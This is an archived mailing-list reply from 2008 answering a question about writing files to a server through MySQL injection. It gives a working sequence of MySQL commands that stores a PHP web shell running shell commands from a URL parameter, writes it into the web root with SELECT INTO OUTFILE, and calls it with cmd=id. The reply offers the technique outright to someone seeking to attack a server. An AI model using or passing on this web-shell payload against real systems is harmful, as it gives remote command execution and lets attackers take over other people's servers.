Re: [WEB SECURITY] Create File in mysql injection

["A. Ramos" <aramosf@xxxxxxxxx>]

You need "FILE" GRANT access (1), and write permission in file system
for your mysql running process.


mysql> CREATE TABLE crap (codetab text);
Query OK, 0 rows affected (0.01 sec)

mysql> INSERT INTO crap (codetab) values ('<? $out =
shell_exec($_GET["cmd"]." 2>&1"); echo "<pre>$out</pre>"; ?>');
Query OK, 1 row affected (0.00 sec)

mysql>  SELECT * INTO OUTFILE '/var/www/html/cmd.php' from crap;
Query OK, 1 row affected (0.00 sec)

And now, you can access with: cmd.php?cmd=id

(1)   http://dev.mysql.com/doc/refman/5.0/en/grant.html



On Sat, Mar 1, 2008 at 2:00 PM, Simorgh Security
<simorgh.security@xxxxxxxxx> wrote:
> In The name Of god .\
>
>  I have Question .
>
>  I can't Creat File in server with sql injection .
>  mysql user : root
>  mysql version :4.0.2
>
>
>  please help me . thanks .
>
>  ----------------------------------------------------------------------------
>  Join us on IRC: irc.freenode.net #webappsec
>
>  Have a question? Search The Web Security Mailing List Archives:
>  http://www.webappsec.org/lists/websecurity/
>
>  Subscribe via RSS:
>  http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>



-- 

A. Ramos  <aka dab>
mailto: <aramosf@xxxxxxxxx>
http://www.unsec.net

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]